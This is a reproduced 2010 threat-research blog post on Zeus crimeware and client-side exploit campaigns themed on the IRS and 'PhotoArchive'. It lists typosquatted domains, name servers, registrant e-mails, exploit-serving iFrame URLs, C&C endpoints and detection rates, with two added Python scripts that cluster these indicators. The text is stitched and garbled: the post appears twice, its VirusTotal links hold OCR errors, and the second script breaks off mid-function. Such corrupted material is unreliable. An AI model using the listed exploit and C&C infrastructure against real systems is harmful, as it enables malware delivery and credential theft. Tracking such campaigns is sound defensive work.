Serving Campaign in the Wild (2010-02-15 23:34) 

UPDATED: Monday, February 22, 2010 - Another portfolio of typosquatted domains is being spamvertised, including two new name servers, parked on the same IP where name servers from previous campaigns were hosted.

Typosquatted domains and name servers of notice are as follows:


Name servers of notice: 

ns1.silverbrend.net - 87.117.245.9 - Email: klincz@aol.com

ns1.hourscanine.com - 87.117.245.9 - Email: carruawau@gmail.com

UPDATED: Sunday, February 21, 2010 - The gang is currently spamming a phishing campaign - no client-side exploit serving iFrames found so far - attempting to steal Google account and Blogspot account data. Given the fact that the gang is capable of generating hundreds of thousands of bogus accounts on their own, as well as buying them in bulk orders from vendors that have already built such an inventory across multiple social networking sites, the only logical reason for attempting to phish for such data would be to attempt to maliciously monetize the traffic of legitimate blogs.
The newly spamvertised domains, including a new name server, are as follows:


ns1.nitroexcel.com - 89.238.165.195 (the same IP was also hosting the name server domains from previous campaigns) - Email: rackmodule@writemail.com

UPDATED: Saturday, February 20, 2010 - The client-side 
exploit serving iFrame directory has been changed to 
91.201.196.101 /usaspll/in.php, with another 
typosquatted portfolio of domains currently being 
spamvertised. 
Detection rates: update.exe - [1]Trojan.Zbot - Result: 25/40 (62.5 %) (phones back to trollar.ru /cnf/trl.jpg - 109.95.114.133 - Email: bernardo_pr@inbox.ru); file.exe - [2]Trojan.Spy.ZBot.12544.1 - Result: 26/41 (63.42 %); ie.js - [3]JS:CVE-2008-0015-G - Result: 14/40 (35 %); ie2.js - [4]Exploit:JS/CVE-2008-0015 - Result: 17/40 (42.5 %); nowTrue.swf - [5]Trojan.SWF.Dropper.E - Result: 24/41 (58.54 %); pdf.pdf - [6]Exploit.JS.Pdfka.bin - Result: 11/41 (26.83 %); swf.swf - [7]SWF/Exploit.Agent.BS - Result: 8/40 (20 %).

Domain portfolio, name server of notice - ns1.vektoroils.net - 74.117.63.218 - Email: admin@forsyte.info:

desa.co.kr - Email: hjfeasey@yahoo.co.uk


UPDATED: Wednesday, February 17, 2010 - The iFrame directory has been changed to 91.201.196.101 /usasp/in.php, detection rate for update.exe - [8]Trojan-Spy.Win32.Zbot.gen - Result: 17/40 (42.5 %).
Currently active and spamvertised domains include:

As anticipated, the botnet masters behind the systematically rotated campaigns dissected in previous posts kick off the week with multiple campaigns parked on the newly introduced fast-fluxed domains.
In a typical multitasking fashion, two campaigns are currently active on different sub domains introduced at the typosquatted fast-flux ones: one impersonating the U.S. IRS with an "Unreported/Underreported Income (Fraud Application)" theme, the other a variation of the [9]already profiled PhotoArchive campaign, using the well known "[10] You don't have the latest version of Macromedia Flash Player" error message.
Let's dissect both campaigns, sharing the same fast-flux infrastructure, and currently spammed in the wild.

Sample campaign URLs from the PhotoArchive, 
SecretArchives themed campaign: 

- archive .repok.or.kr/archive0714/?id=test@test.com

- secretarchives .renyn.kr/archive0714/?id=test@test.com

- secretfiles .repolit.me.uk/archive0714/?id=test@test.com

- secretarchives .renyn.ne.kr/archive0714/?id=test@test.com

- postcards .repolix.co.uk/archive0714/?id=test@test.com

Sample sub domain structure: 




Embedded iFrame - 91.201.196.101 /ukasp/in.php (AS42229 (MARIAM-AS PP Mariam)) attempts to exploit [11]CVE-2007-5659; [12]CVE-2008-2992; [13]CVE-2008-0015; [14]CVE-2009-0927 and [15]CVE-2009-4324. Upon successful exploitation, file.exe - [16]Trojan-Spy.Win32.Zbot.gen - Result: 12/41 (29.27 %) is served. Just like the original update.exe - [17]Trojan.Zbot - Result: 13/40 (32.50 %) available as a manual download from the pages, both [18]samples phone back to the well known elnasa.ru /asd/elnasa.ble - 109.95.114.71 - Email: kievsk@yandex.ru - [19]Aleksey V Kijanskiy.

Naturally, [20]AS42229 (MARIAM-AS PP Mariam) is a cybercrime-friendly AS, with the following currently active Zeus C&Cs parked there:


Sample URL from the IRS-themed campaign:

- irs.gov .renyn.kr/fraud.applications/application/statement.php

Sample iFrame from the IRS-themed campaign - 109.95.114.251 /usa50/in.php is currently down. The same IP was used to serve client-side exploits in a previous campaign - "[21] Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams".

Detection rate for tax-statement.exe - [22]Trojan-Spy.Win32.Zbot.gen - Result: 37/41 (90.25 %), [23]which upon execution phones [24]back to the well known nekovo.ru /cbd/nekovo.br - 109.95.115.18 - Email: kievsk@yandex.ru - Aleksey V Kijanskiy
Active and spamvertised fast-fluxed domains part of the campaign:


Name servers of notice:

ns1.skcrealestate.net - 89.238.165.195 - Email: support@skrealty.net

ns1.addressway.net - 89.238.165.195 - Email: poolbill@hotmail.com

ns1.skcpanel.com - 64.20.42.235 - Email: support@sk.com

ns1.holdinglory.com - 64.20.42.235 - Email: greysy@gmx.com

ns1.skcres.com - 64.20.42.235 - Email: hr@skc.net

ns1.x-videocovers.net - 64.20.42.235 - Email: storylink@live.com
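The pivots used by hand throughout this post (one registrant e-mail across a whole portfolio, one name server IP shared between campaigns, and domain labels that differ only in their last character) can be scripted. The following is an added Python example, not code from the original post; its sample input is constructed from a handful of the indicators listed above, in the post's own "domain - Email: x" notation.

```python
import re
from collections import defaultdict

# Constructed sample input: a few of the post's own domains and name servers,
# written in the post's "host - Email: x" / "host - IP - Email: x" notation.
SAMPLE = """
desa.co.kr - Email: hjfeasey@yahoo.co.uk
desa.kr - Email: hjfeasey@yahoo.co.uk
desb.ne.kr - Email: hjfeasey@yahoo.co.uk
desz.or.kr - Email: hjfeasey@yahoo.co.uk
renya.co.kr - Email: Sethdc77@yahoo.co.uk
renyn.kr - Email: Sethdc77@yahoo.co.uk
rep021.co.kr - Email: DRendell3407@hotmail.com
rep022.kr - Email: DRendell3407@hotmail.com
ns1.skcrealestate.net - 89.238.165.195 - Email: support@skrealty.net
ns1.addressway.net - 89.238.165.195 - Email: poolbill@hotmail.com
ns1.nitroexcel.com - 89.238.165.195 - Email: rackmodule@writemail.com
ns1.skcpanel.com - 64.20.42.235 - Email: support@sk.com
"""

# Public suffixes seen in the post's portfolios; the longest match wins.
SUFFIXES = ("co.kr", "ne.kr", "or.kr", "kr", "co.uk", "me.uk", "org.uk",
            "uk.com", "net", "com")

LINE_RE = re.compile(
    r"^(?P<host>[\w.-]+)"                                   # domain or name server
    r"(?:\s+-\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"          # optional IP (name servers)
    r"\s+-\s+Email:\s+(?P<email>\S+)$"                      # registrant e-mail
)


def split_host(host):
    """Split 'desa.co.kr' into ('desa', 'co.kr'); fall back to the last label."""
    for suf in sorted(SUFFIXES, key=len, reverse=True):
        if host.endswith("." + suf):
            return host[: -len(suf) - 1], suf
    label, _, suf = host.rpartition(".")
    return label, suf


def parse(text):
    """Turn the post's indicator lines into records; lines in another format are skipped."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        host = m.group("host").lower()
        label, suffix = split_host(host)
        records.append({
            "host": host, "label": label, "suffix": suffix,
            "ip": m.group("ip"), "email": m.group("email").lower(),
            # the post only lists IPs for name servers
            "is_ns": host.startswith("ns") and m.group("ip") is not None,
        })
    return records


def cluster_by_email(records):
    """Registrant e-mail is the cheapest pivot: one address, a whole portfolio."""
    groups = defaultdict(set)
    for r in records:
        groups[r["email"]].add(r["host"])
    return {email: sorted(hosts) for email, hosts in groups.items()}


def typosquat_families(records):
    """Group domains whose labels differ only in the last character
    (desa/desb/desz, renya/renyn, rep021/rep022), as the post's portfolios do."""
    hosts_by_stem = defaultdict(set)
    labels_by_stem = defaultdict(set)
    for r in records:
        if r["is_ns"] or len(r["label"]) < 3:
            continue
        stem = r["label"][:-1]
        hosts_by_stem[stem].add(r["host"])
        labels_by_stem[stem].add(r["label"])
    return {stem: sorted(labels_by_stem[stem])
            for stem, hosts in hosts_by_stem.items() if len(hosts) > 1}


def shared_ns_ips(records):
    """Name servers from different campaigns parked on one IP tie the campaigns together."""
    by_ip = defaultdict(set)
    for r in records:
        if r["is_ns"]:
            by_ip[r["ip"]].add(r["host"])
    return {ip: sorted(ns) for ip, ns in by_ip.items() if len(ns) > 1}


def report(records):
    """One line per pivot worth a second look."""
    lines = []
    for stem, labels in sorted(typosquat_families(records).items()):
        lines.append(f"family {stem}*: {', '.join(labels)}")
    for email, hosts in sorted(cluster_by_email(records).items()):
        if len(hosts) > 1:
            lines.append(f"registrant {email}: {len(hosts)} hosts")
    for ip, ns in sorted(shared_ns_ips(records).items()):
        lines.append(f"ns IP {ip}: {', '.join(ns)}")
    return lines


if __name__ == "__main__":
    for line in report(parse(SAMPLE)):
        print(line)
```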



Interestingly, researchers from [25]M86 Security gained access to the web malware exploitation kit used in a previous campaign:

" It has been up and running and serving exploits for nearly a day. In this time almost 40,000 unique users have been exposed to these exploits, and the Zeus file has been downloaded over 5000 times. These downloads do not include the PhotoArchive.exe file downloads that a user may be tricked into downloading and executing themselves. "

Updates will be posted as soon as new developments emerge.

Related coverage of the gang's previous campaigns:

[26] Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild

[27] PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild

[28] Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits

[29] Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams

[30] Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware

[31] Pushdo Injecting Bogus Swine Flu Vaccine

[32] "Your mailbox has been deactivated" Spam Campaign Serving Crimeware

[33] Ongoing FDIC Spam Campaign Serves Zeus Crimeware

[34] The Multitasking Fast-Flux Botnet that Wants to Bank With You

This post has been reproduced from [35]Dancho Danchev's 
blog. Follow him [36]on Twitter. 

1. 

http://www.virustotal.com/analisis/efl20bf9f7791f0acefb05d 

4628d2c2d87999938fdb9f3152142436bc321ec05-12666 

91798 

2 . 

http://www.virustotal.com/analisis/ea81al21b75fe8ad2e445 

Cdl3a6350850de2bf21cdb6dldc4eac247b2aac3a40-12667 

08037 

3. 

http://www.virustotal.com/analisis/1983abeb8001365952fe0 

68i4ab6a676acebac0blcbf4f3d2030de424bQdel30-12G66 

91316 

4. 

http://www.virustotal.com/analisis/f4dl9dca77a571b73eaelf 

0c3640db81cc257472flcc9e3flca0376216df4a91-12666 

91333 
5.

http://www.vi rustotal.com/analisis/de54327ae5b208flf4570 

4d41ef03cQ2758f7fl2c2f63907db70429529c44df3-12666 

91345 

6 . 

http://www.virustotal.com/analisis/36e91b84b8e3f83a8044d 

3c375398d9840dce4fl2d8c312f417e98f696dc34eQ-12666 

91352 

7. 

http://www.virustotal.com/analisis/6a0295a38536274beca2a 

f613afbadabbdd29cbfb669942b02aec810d68ff019-12666 

91365 

8 . 

http://www.virustotal.com/analisis/7556adl6c7507777c21a7 

3ebcc5d5ff3661f5e44a98899fll7aa96bc3246flfd-12664 

25345 

9. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

10. http://irs/PhotoArchive%20Themed%20Zeus/Client-Side%20Exploits%20Serving%20Campaign%20in%20the%20Wild
11. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659

12. http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992

13. http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-0015

14. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927

15. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324

16. 

http://www.virustotal.com/analisis/3cl393354cl40fc2a64cb68f 

e9fa51c575dablaf87065abbef811dd4d7e051db07-12662 

75738 

17. 

http://www.virustotal.com/analisis/3aaa85a66689a9c092431 

27b0831e7294b3dbl91ce0c3e81ebc871fe843506fc-12662 

68338 

18. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

19. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

20. https://zeustracker.abuse.ch/monitor.php?as=42229

21. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

22 . 

http://www.vi rustotal.com/analisis/f72cf75417e21eecf8defal 

a52a9601c4eb4dbfd3961e782bdlc0aa0157ce8fc-12662 

68334 


23. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

24. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

25. http://www.m86security.com/trace/traceitem.asp?article=1233

26. http://ddanchev.blogspot.com/2010/02/tax-report-themed-zeusclient-side.html

27. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

28. http://ddanchev.blogspot.com/2010/01/facebookaol-update-tool-spam-campaign.html

29. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

30. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

31. http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html

32. http://ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.html

33. http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html
34. http://ddanchev.blogspot.com/2009/07/multitasking-fast-flux-botnet-that.html

35. http://ddanchev.blogspot.com/

36. http://twitter.com/danchodanchev
[Screenshot: HTML source of the bogus "You don't have the latest version of Macromedia Flash Player" page used by the PhotoArchive campaign]

IRS/PhotoArchive Themed Zeus/Client-Side Exploits 
Serving Campaign in the Wild (2010-02-15 23:34) 

SECOND UPDATE for Wednesday, February 24, 2010 - Another portfolio of new domains is being spamvertised, using the old PhotoArchive theme. The client-side exploits serving iFrame directory has been changed to 91.201.196.101 /usasp33/in.php currently serving CVE-2007-5659; CVE-2008-2992; CVE-2008-0015; CVE-2009-0927 and CVE-2009-4324.

Sample detection rates: update.exe - [1]Trojan-Spy.Win32.Zbot.gen - Result: 10/42 (23.81 %); file.exe - [2]TrojanSpy.Win32.Zbot.gen - Result: 10/42 (23.81 %). Samples phone back to the same C&C where samples from
previous campaigns were also phoning back to - trollar.ru /cnf/trl.jpg - 109.95.114.133 - Email: bernardo_pr@inbox.ru.

Domains portfolio: 

Name server of notice:

ns1.skcstaffing.com - 87.117.245.9 - Email: hr@department.com



UPDATED: Wednesday, February 24, 2010 - Another portfolio of typosquatted domains has been spamvertised. The already suspended domains are listed for historical OSINT analysis of this gang's activities.

Interestingly, their campaigns are lacking the quality assurance I'm used to seeing. For instance, the iFrame IP (109.95.114.251 /usa50/in.php) is currently down, and the malware itself, including the one that would have been dropped had the exploitation taken place, has over 90 % detection rate, since the binaries were first analyzed a
month ago - tax-statement.exe - [3]Trojan-Spy.Win32.Zbot - 40/42 (95.24 %); abs.exe - [4]Packed:W32/Mufanom.A - Result: 38/42 (90.48 %). The directory structure also remains the same - irs.gov.yrxc.kr/fraud.applications/application/statement.php

Domains portfolio, including name servers of notice, is as follows:


Name servers of notice:

ns1.skc-realty.com - 89.238.165.195 - Email: skc@realty.net

ns1.chinafromasia.com

UPDATED: Monday, February 22, 2010 - Another 
typosquatted domains portfolio is being spamvertised, in¬ 
cluding two new name servers, parked on the same IP where 
name servers from previous campaigns were hosted. 
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204 85 72179 -—► 204 84 0 0715 -—-► AS81 



Typosquatted domains, and name servers of notice are as 
follows: 

dese.co.kr - Email: asondrapgt@hotmail.com
dese.kr - Email: asondrapgt@hotmail.com
dese.ne.kr - Email: asondrapgt@hotmail.com
dese.or.kr - Email: asondrapgt@hotmail.com
desr.co.kr - Email: asondrapgt@hotmail.com
desr.kr - Email: asondrapgt@hotmail.com
desr.or.kr - Email: asondrapgt@hotmail.com
desv.co.kr - Email: asondrapgt@hotmail.com
desv.kr - Email: asondrapgt@hotmail.com
desv.ne.kr - Email: asondrapgt@hotmail.com
desv.or.kr - Email: asondrapgt@hotmail.com
desx.co.kr - Email: asondrapgt@hotmail.com
desx.kr - Email: asondrapgt@hotmail.com
desx.ne.kr - Email: asondrapgt@hotmail.com
desx.or.kr - Email: asondrapgt@hotmail.com

edasa.co.kr
edasa.kr
edasa.ne.kr
edasa.or.kr
edase.co.kr
edase.kr
edase.ne.kr
edase.or.kr
edasn.kr
edasn.ne.kr
edasn.or.kr
edasq.co.kr
edasq.kr
edasq.ne.kr
edasq.or.kr

Name servers of notice:

ns1.silverbrend.net - 87.117.245.9 - Email: klincz@aol.com

ns1.hourscanine.com - 87.117.245.9 - Email: carruawau@gmail.com

UPDATED: Sunday, February 21, 2010 - The gang is currently spamming a phishing campaign - no client-side exploit serving iFrames found so far - attempting to steal Google account and Blogspot accounting data. Given the fact that the gang is capable of generating hundreds of thousands of bogus accounts on their own, as well as buy them in bulk orders from vendors that have already built such an inventory across multiple social networking sites, the only logical reason for attempting to phish for such data would be to attempt to maliciously monetize the traffic of legitimate blogs.

The newly spamvertised domains, including a new name server, are as follows:

esub.co.kr - Email: osamplerl61@hotmail.com
esub.kr - Email: osamplerl61@hotmail.com
esub.ne.kr - Email: osamplerl61@hotmail.com
esug.co.kr - Email: osamplerl61@hotmail.com
esug.kr - Email: osamplerl61@hotmail.com
esug.ne.kr - Email: osamplerl61@hotmail.com
esuk.kr - Email: osamplerl61@hotmail.com
esuk.ne.kr - Email: osamplerl61@hotmail.com
esuk.or.kr - Email: osamplerl61@hotmail.com
esus.co.kr - Email: osamplerl61@hotmail.com
esus.kr - Email: osamplerl61@hotmail.com
esus.ne.kr - Email: osamplerl61@hotmail.com
esut.co.kr - Email: osamplerl61@hotmail.com
esut.kr - Email: osamplerl61@hotmail.com
esut.ne.kr - Email: osamplerl61@hotmail.com

ns1.nitroexcel.com - 89.238.165.195 (the same IP was also hosting the name server domains from previous campaigns) - Email: rackmodule@writemail.com

UPDATED: Saturday, February 20, 2010 - The client-side exploit serving iFrame directory has been changed to 91.201.196.101 /usaspll/in.php, with another typosquatted portfolio of domains currently being spamvertised.

[Figure: 114.27.36.147 -> 114.27.0.0/16 -> AS3462]



Detection rates: update.exe - [5]Trojan.Zbot - Result: 25/40 (62.5 %) (phones back to trollar.ru /cnf/trl.jpg - 109.95.114.133 - Email: bernardo_pr@inbox.ru); file.exe - [6]Trojan.Spy.ZBot.12544.1 - Result: 26/41 (63.42 %); ie.js - [7]JS:CVE-2008-0015-G - Result: 14/40 (35 %); ie2.js - [8]Exploit:JS/CVE-2008-0015 - Result: 17/40 (42.5 %); nowTrue.swf - [9]Trojan.SWF.Dropper.E - Result: 24/41 (58.54 %); pdf.pdf - [10]Exploit.JS.Pdfka.bin - Result: 11/41 (26.83 %); swf.swf - [11]SWF/Exploit.Agent.BS - Result: 8/40 (20 %).

Domain portfolio, name server of notice - ns1.vektoroils.net - 74.117.63.218 - Email: admin@forsyte.info:

[Figure: 116.80.31.193 -> 116.80.0.0/14 -> AS2510]

desa.co.kr - Email: hjfeasey@yahoo.co.uk
desa.kr - Email: hjfeasey@yahoo.co.uk
desa.ne.kr - Email: hjfeasey@yahoo.co.uk
desa.or.kr - Email: hjfeasey@yahoo.co.uk
desb.co.kr - Email: hjfeasey@yahoo.co.uk
desb.kr - Email: hjfeasey@yahoo.co.uk
desb.ne.kr - Email: hjfeasey@yahoo.co.uk
desb.or.kr - Email: hjfeasey@yahoo.co.uk
deso.kr - Email: hjfeasey@yahoo.co.uk
deso.or.kr - Email: hjfeasey@yahoo.co.uk
desv.kr - Email: hjfeasey@yahoo.co.uk
desz.co.kr - Email: hjfeasey@yahoo.co.uk
desz.kr - Email: hjfeasey@yahoo.co.uk
desz.ne.kr - Email: hjfeasey@yahoo.co.uk
desz.or.kr - Email: hjfeasey@yahoo.co.uk

UPDATED: Wednesday, February 17, 2010 - The iFrame directory has been changed to 91.201.196.101 /usasp/in.php, detection rate for update.exe - [12]Trojan-Spy.Win32.Zbot.gen - Result: 17/40 (42.5 %).

Currently active and spamvertised domains include:

saqwk.co.kr - Email: Camerc05@yahoo.com
saqwk.kr - Email: Camerc05@yahoo.com
saqwk.ne.kr - Email: Camerc05@yahoo.com
saqwk.or.kr - Email: Camerc05@yahoo.com
saqwm.co.kr - Email: Camerc05@yahoo.com
saqwm.kr - Email: Camerc05@yahoo.com
saqwm.ne.kr - Email: Camerc05@yahoo.com
saqwq.co.kr - Email: Camerc05@yahoo.com
saqwq.kr - Email: Camerc05@yahoo.com
saqwq.ne.kr - Email: Camerc05@yahoo.com
saqwq.or.kr - Email: Camerc05@yahoo.com
saqwz.co.kr - Email: Camerc05@yahoo.com
saqwz.kr - Email: Camerc05@yahoo.com
saqwz.ne.kr - Email: Camerc05@yahoo.com
saqwz.or.kr - Email: Camerc05@yahoo.com

As anticipated, the botnet masters behind the systematically rotated campaigns dissected in previous posts kick off the week with multiple campaigns parked on the newly introduced fast-fluxed domains.

[Figure: 168.122.176.29 -> 168.122.128.0/17 -> AS111]



In a typical multitasking fashion, two campaigns are currently active on different sub domains introduced at the typosquatted fast-flux ones, impersonating the U.S. IRS with an "Unreported/Underreported Income (Fraud Application)" theme, as well as a variation of the [13]already profiled PhotoArchive campaign, using a well known "[14]You don't have the latest version of Macromedia Flash Player" error message.

Let's dissect both campaigns, sharing the same fast-flux infrastructure, and currently spammed in the wild.

Sample campaign URLs from the PhotoArchive, SecretArchives themed campaign:

- archive .repok.or.kr/archive0714/?id=test@test.com
- secretarchives .renyn.kr/archive0714/?id=test@test.com
- secretfiles .repolit.me.uk/archive0714/?id=test@test.com
- secretarchives .renyn.ne.kr/archive0714/?id=test@test.com
- postcards .repolix.co.uk/archive0714/?id=test@test.com

Sample sub domain structure:

anonymousfiles .repoli2.me.uk
archive .repoliq.me.uk
archive .repolit.me.uk
archives .repolil.me.uk
filearchive .repolil.me.uk
files .repolit.me.uk
files .repolix.me.uk
files4friends .repolit.me.uk
secretarchives .repoliq.me.uk
secretarchives .repoliw.me.uk
secretarchives .repolix.me.uk
secretfiles .repoliq.me.uk
sendspace .repoli2.me.uk
archive .repolix.co.uk
archives .repoliq.co.uk
archives .repolix.co.uk
files .repoliq.co.uk
files4friends .repolix.co.uk
incognito .repoliq.co.uk
postcard .repoliq.co.uk
postcard .repoliw.co.uk
secretarchives .repoliw.co.uk
www.irs.gov.repolix.co.uk



Embedded iFrame - 91.201.196.101 /ukasp/in.php (AS42229, MARIAM-AS PP Mariam) attempts to exploit [15]CVE-2007-5659; [16]CVE-2008-2992; [17]CVE-2008-0015; [18]CVE-2009-0927 and [19]CVE-2009-4324. Upon successful exploitation, file.exe - [20]Trojan-Spy.Win32.Zbot.gen - Result: 12/41 (29.27 %) is served. Just like the original update.exe - [21]Trojan.Zbot - Result: 13/40 (32.50 %), available as a manual download from the pages, both [22]samples phone back to the well known elnasa.ru /asd/elnasa.ble - 109.95.114.71 - Email: kievsk@yandex.ru - [23]Aleksey V Kijanskiy.

Naturally, [24]AS42229 (MARIAM-AS PP Mariam) is a cybercrime-friendly AS, with the following currently active Zeus C&Cs parked there:

91.201.196.35
91.201.196.75
91.201.196.76
91.201.196.38
91.201.196.34
91.201.196.37

Sample URL from the IRS-themed campaign:

- irs.gov .renyn.kr/fraud.applications/application/statement.php

Sample iFrame from the IRS-themed campaign - 109.95.114.251 /usa50/in.php is currently down. The same IP was used to serve client-side exploits in a previous campaign - "[25]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams".

Detection rate for tax-statement.exe - [26]Trojan-Spy.Win32.Zbot.gen - Result: 37/41 (90.25 %), [27]which upon execution phones [28]back to the well known nekovo.ru /cbd/nekovo.br - 109.95.115.18 - Email: kievsk@yandex.ru - Aleksey V Kijanskiy
Active and spamvertised fast-fluxed domains part of the campaign:

renya.co.kr - Email: Sethdc77@yahoo.co.uk
renya.kr - Email: Sethdc77@yahoo.co.uk
renya.ne.kr - Email: Sethdc77@yahoo.co.uk
renya.or.kr - Email: Sethdc77@yahoo.co.uk
renyn.kr - Email: Sethdc77@yahoo.co.uk
renyn.ne.kr - Email: Sethdc77@yahoo.co.uk
renyn.or.kr - Email: Sethdc77@yahoo.co.uk
renyo.co.kr - Email: Sethdc77@yahoo.co.uk
renyo.kr - Email: Sethdc77@yahoo.co.uk
renyo.ne.kr - Email: Sethdc77@yahoo.co.uk
renyo.or.kr - Email: Sethdc77@yahoo.co.uk
renyx.co.kr - Email: Sethdc77@yahoo.co.uk
renyx.kr - Email: Sethdc77@yahoo.co.uk
renyx.ne.kr - Email: Sethdc77@yahoo.co.uk
renyx.or.kr - Email: Sethdc77@yahoo.co.uk
rep021.co.kr - Email: DRendell3407@hotmail.com
rep021.kr - Email: DRendell3407@hotmail.com
rep021.ne.kr - Email: DRendell3407@hotmail.com
rep021.or.kr - Email: DRendell3407@hotmail.com
rep022.co.kr - Email: DRendell3407@hotmail.com
rep022.kr - Email: DRendell3407@hotmail.com
rep022.ne.kr - Email: DRendell3407@hotmail.com
rep022.or.kr - Email: DRendell3407@hotmail.com
rep023.co.kr - Email: DRendell3407@hotmail.com
rep023.kr - Email: DRendell3407@hotmail.com
rep023.or.kr - Email: DRendell3407@hotmail.com
rep024.kr - Email: DRendell3407@hotmail.com
rep071.co.kr - Email: KantuM37690@hotmail.com
rep071.kr - Email: KantuM37690@hotmail.com
rep071.ne.kr - Email: KantuM37690@hotmail.com
rep071.or.kr - Email: KantuM37690@hotmail.com
rep072.co.kr - Email: KantuM37690@hotmail.com
rep072.kr - Email: KantuM37690@hotmail.com
rep072.ne.kr - Email: KantuM37690@hotmail.com
rep072.or.kr - Email: KantuM37690@hotmail.com
rep073.co.kr - Email: KantuM37690@hotmail.com
rep073.kr - Email: KantuM37690@hotmail.com
rep073.ne.kr - Email: KantuM37690@hotmail.com
rep073.or.kr - Email: KantuM37690@hotmail.com
rep074.co.kr - Email: KantuM37690@hotmail.com
rep074.ne.kr - Email: KantuM37690@hotmail.com
rep074.or.kr - Email: KantuM37690@hotmail.com
repl051.co.uk
repl051.me.uk
repl051.org.uk
repl051.uk.com
repak.co.kr - Email: limhomeslm@yahoo.co.uk
repak.kr - Email: limhomeslm@yahoo.co.uk
repak.ne.kr - Email: limhomeslm@yahoo.co.uk
repak.or.kr - Email: limhomeslm@yahoo.co.uk
repaz.co.kr - Email: Olb55768@yahoo.co.uk
repaz.kr - Email: Olb55768@yahoo.co.uk
repaz.or.kr - Email: Olb55768@yahoo.co.uk
repek.co.kr - Email: limhomeslm@yahoo.co.uk
repek.ne.kr - Email: limhomeslm@yahoo.co.uk
repek.or.kr - Email: limhomeslm@yahoo.co.uk
repey.co.kr - Email: Olb55768@yahoo.co.uk
repey.kr - Email: Olb55768@yahoo.co.uk
repey.ne.kr - Email: Olb55768@yahoo.co.uk
repey.or.kr - Email: Olb55768@yahoo.co.uk
repia.co.kr - Email: Olb55768@yahoo.co.uk
repia.kr - Email: Olb55768@yahoo.co.uk
repia.ne.kr - Email: Olb55768@yahoo.co.uk
repia.or.kr - Email: Olb55768@yahoo.co.uk
repik.co.kr - Email: limhomeslm@yahoo.co.uk
repik.kr - Email: limhomeslm@yahoo.co.uk
repik.or.kr - Email: limhomeslm@yahoo.co.uk
repok.co.kr - Email: limhomeslm@yahoo.co.uk
repok.kr - Email: limhomeslm@yahoo.co.uk
repok.ne.kr - Email: limhomeslm@yahoo.co.uk
repok.or.kr - Email: limhomeslm@yahoo.co.uk
repoy.co.kr - Email: Olb55768@yahoo.co.uk
repoy.kr - Email: Olb55768@yahoo.co.uk
repoy.ne.kr - Email: Olb55768@yahoo.co.uk
repoy.or.kr - Email: Olb55768@yahoo.co.uk
repolil.co.uk
repolil.me.uk
repoli2.co.uk
repoli2.me.uk
repoli3.co.uk
repolie.co.uk
repolio.co.uk
repoliq.co.uk
repoliq.me.uk
repolit.me.uk
repoliw.co.uk
repoliw.me.uk
repolix.co.uk
repolix.me.uk

Name servers of notice:

ns1.skcrealestate.net - 89.238.165.195 - Email: support@skrealty.net

ns1.addressway.net - 89.238.165.195 - Email: poolbill@hotmail.com

ns1.skcpanel.com - 64.20.42.235 - Email: support@sk.com

ns1.holdinglory.com - 64.20.42.235 - Email: greysy@gmx.com

ns1.skcres.com - 64.20.42.235 - Email: hr@skc.net

ns1.x-videocovers.net - 64.20.42.235 - Email: storylink@live.com

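The analysis above repeatedly pivots on two attributes: a registrant e-mail address shared by a whole batch of typosquatted domains, and a name server IP that keeps hosting the name servers of successive campaigns. The following is an added example, not code from the original post, that automates exactly that pivot over WHOIS-style records: it links domains that share a registrant e-mail or a name-server IP (transitively), summarizes what each name-server IP ties together, and emits a flat blocklist. The domains, e-mails, name servers and IPs in the sample records are taken from the lists in this post; which domain used which name server is an assumption made for the example, as is the `RECORDS` tuple layout.

```python
"""Cluster spamvertised domains by shared registrant e-mail and name-server IP.

Added example; not code from the original post. The sample records are
constructed from values that appear in the post, but the pairing of a domain
with a particular name server is an assumption made for this example.
"""
from collections import defaultdict

# Constructed sample: (domain, registrant_email or None, name_server, ns_ip)
RECORDS = [
    ("renya.co.kr", "Sethdc77@yahoo.co.uk", "ns1.skcrealestate.net", "89.238.165.195"),
    ("renyn.kr", "Sethdc77@yahoo.co.uk", "ns1.addressway.net", "89.238.165.195"),
    ("repak.co.kr", "limhomeslm@yahoo.co.uk", "ns1.skcpanel.com", "64.20.42.235"),
    ("repolix.co.uk", None, "ns1.holdinglory.com", "64.20.42.235"),
    ("esub.co.kr", "osamplerl61@hotmail.com", "ns1.nitroexcel.com", "89.238.165.195"),
    ("dese.co.kr", "asondrapgt@hotmail.com", "ns1.silverbrend.net", "87.117.245.9"),
    ("edasa.co.kr", None, "ns1.hourscanine.com", "87.117.245.9"),
    ("aerojackpot.net", "dfgdfgvcsxl2@foxmail.com", "ns1.bb6ns.com", "58.83.8.45"),
]


class UnionFind:
    """Minimal disjoint-set structure used to take the transitive closure of links."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
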